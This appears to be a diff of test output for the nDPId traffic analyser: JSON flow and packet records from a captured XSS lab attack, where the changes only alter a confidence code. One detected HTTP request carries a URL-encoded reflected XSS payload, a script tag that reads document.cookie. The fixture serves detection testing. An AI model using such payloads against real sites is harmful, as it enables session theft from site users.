-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499347547687,"flow_last_seen":1499347614979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232682,"flow_avg_l4_payload_len":738,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6463,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"finished","flow_packets_processed":315,"flow_first_seen":1499347547687,"flow_last_seen":1499347614979,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1870,"flow_tot_l4_payload_len":232682,"flow_avg_l4_payload_len":738,"midstream":0,"thread_ts_msec":1499347740821,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58360,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347743331,"flow_last_seen":1499347743331,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347743331,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6472,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1499347743331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iytAAD4GOqWsEAABwKgKMuwwAFCeqlZOAAAAAKACchCe6QAAAgQFtAQCCAoBO91lAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6473,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":2,"flow_last_seen":1499347743331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347743331,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7DCbKjZEnqpWT6AScSAbmgAAAgQFtAQCCAoD5a7aATvdZQEDAwc="} 
@@ -2601,7 +2601,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6484,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1499347744595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8iGtAAD4GPWWsEAABwKgKMuw+AFAw9lbKAAAAAKACchAK2AAAAgQFtAQCCAoBO96hAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6485,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":2,"flow_last_seen":1499347744595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347744595,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7D5E+wDpMPZWy6AScSAR1wAAAgQFtAQCCAoD5bAWATveoQEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6486,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":3,"flow_last_seen":1499347744595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347744595,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0iGxAAD4GPWysEAABwKgKMuw+AFAw9lbLRPsA6oAQAOWw3gAAAQEICgE73qED5bAW"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347743331,"flow_last_seen":1499347746913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347746913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6505,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347743331,"flow_last_seen":1499347746913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1499347746913,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60464,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 
00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347747187,"flow_last_seen":1499347747187,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347747187,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60504,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6509,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":1,"flow_last_seen":1499347747187,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eZ5AAD4GTDKsEAABwKgKMuxYAFDkpJi3AAAAAKACchASmgAAAgQFtAQCCAoBO+EpAAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6510,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":460,"flow_packet_id":2,"flow_last_seen":1499347747187,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347747187,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7FgZ9EBx5KSYuKAScSACkAAAAgQFtAQCCAoD5bKeATvhKQEDAwc="} 
@@ -2796,7 +2796,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6955,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":1,"flow_last_seen":1499347802549,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jF5AAD4GOXKsEAABwKgKMoBUAFDx5ZtkAAAAAKACchA4nwAAAgQFtAQCCAoBPBc6AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6956,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":2,"flow_last_seen":1499347802549,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347802549,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgFQ6vzwG8eWbZaAScSDWJAAAAgQFtAQCCAoD5eiuATwXOgEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6957,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":492,"flow_packet_id":3,"flow_last_seen":1499347802550,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347802550,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jF9AAD4GOXmsEAABwKgKMoBUAFDx5ZtlOr88B4AQAOV1LAAAAQEICgE8FzoD5eiu"} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"finished","flow_packets_processed":321,"flow_first_seen":1499347611162,"flow_last_seen":1499347679227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232367,"flow_avg_l4_payload_len":723,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"finished","flow_packets_processed":321,"flow_first_seen":1499347611162,"flow_last_seen":1499347679227,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232367,"flow_avg_l4_payload_len":723,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347668069,"flow_last_seen":1499347673803,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6964,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347669336,"flow_last_seen":1499347674804,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347802840,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -2827,7 +2827,7 @@ 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7030,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":1,"flow_last_seen":1499347811525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8\/z1AAD4GxpKsEAABwKgKMoCyAFD5M+DDAAAAAKACchDizwAAAgQFtAQCCAoBPB\/+AAAAAAEDAwc="} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7031,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":2,"flow_last_seen":1499347811525,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347811525,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgLJEEu3h+TPgxKAScSC8YgAAAgQFtAQCCAoD5fFyATwf\/gEDAwc="} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7032,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":497,"flow_packet_id":3,"flow_last_seen":1499347811526,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347811526,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0\/z5AAD4GxpmsEAABwKgKMoCyAFD5M+DERBLt4oAQAOVbagAAAQEICgE8H\/4D5fFy"} 
-01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347807664,"flow_last_seen":1499347811526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347811526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27UQE70NGV80W4ZBVWQELDMRMBY9BF6W552ZBHL3F4W4MIP7R7K6%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7033,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":495,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347807664,"flow_last_seen":1499347811526,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347811526,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32906,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"205.174.165.68","url":"205.174.165.68\/dv\/vulnerabilities\/xss_r\/?name=%3Cscript%3Econsole.log%28%27UQE70NGV80W4ZBVWQELDMRMBY9BF6W552ZBHL3F4W4MIP7R7K6%27%29%3Bconsole.log%28document.cookie%29%3B%3C%2Fscript%3E","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:45.0) Gecko\/20100101 Firefox\/45.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347812797,"flow_last_seen":1499347812797,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347812797,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":32960,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7043,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":1,"flow_last_seen":1499347812797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8YtxAAD4GYvSsEAABwKgKMoDAAFAQTEPgAAAAAKACchBnTwAAAgQFtAQCCAoBPCE8AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7044,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":498,"flow_packet_id":2,"flow_last_seen":1499347812797,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347812797,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgMBbJW45EExD4aAScSCoOQAAAgQFtAQCCAoD5fKwATwhPAEDAwc="} 
@@ -3050,7 +3050,7 @@ 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":1,"flow_last_seen":1499347874737,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88wxAAD4G0sOsEAABwKgKMoNIAFDgx661AAAAAKACchDs+AAAAgQFtAQCCAoBPF25AAAAAAEDAwc="} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":2,"flow_last_seen":1499347874737,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347874737,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg0iSQssc4MeutqAScSBdZQAAAgQFtAQCCAoD5i8tATxduQEDAwc="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7547,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":534,"flow_packet_id":3,"flow_last_seen":1499347874738,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347874738,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08w1AAD4G0sqsEAABwKgKMoNIAFDgx662kkLLHYAQAOX8bAAAAQEICgE8XbkD5i8t"} 
-00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347675703,"flow_last_seen":1499347745908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232186,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347675703,"flow_last_seen":1499347745908,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232186,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59732,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347740751,"flow_last_seen":1499347745824,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60438,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347744595,"flow_last_seen":1499347749825,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60478,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
@@ -3061,7 +3061,7 @@ 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":461,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347748472,"flow_last_seen":1499347753827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60518,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7554,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":462,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347749751,"flow_last_seen":1499347754827,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347874866,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60532,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
